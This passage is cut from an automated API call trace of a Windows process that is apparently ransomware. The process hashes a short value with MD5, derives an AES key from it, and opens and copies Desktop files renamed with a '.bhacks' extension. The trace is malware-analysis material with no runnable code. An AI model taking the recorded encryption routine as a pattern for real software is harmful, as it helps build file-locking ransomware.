dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.744] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0106.744] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.744] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0106.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.745] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73bc0 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0106.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0106.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0106.746] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0106.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0106.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0106.746] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0106.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0106.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0106.746] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.746] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0106.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ec8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0106.747] CryptHashData (hHash=0x9a3b80, pbData=0x2a719f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0106.747] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.747] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.747] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0106.747] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0106.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0106.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0106.747] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4800) returned 1 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0106.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0106.748] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.748] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0106.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0106.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f71e0 [0106.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0106.749] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0106.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0106.749] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/W3nCKPmZd6_T8yGD3CRn.jpg.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0106.750] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.750] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0106.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0106.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0106.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0106.750] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0106.750] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.W3nCKPmZd6_T8yGD3CRn.jpg.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.w3nckpmzd6_t8ygd3crn.jpg.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0106.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0106.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0106.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0106.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0106.808] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0106.808] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x3450, lpOverlapped=0x0) returned 1 [0106.809] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0106.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0106.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0106.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0106.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0106.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3450) returned 0x2ace888 [0106.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4caf020 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3450) returned 0x2a7a130 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0106.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3450) returned 0x2ace888 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree 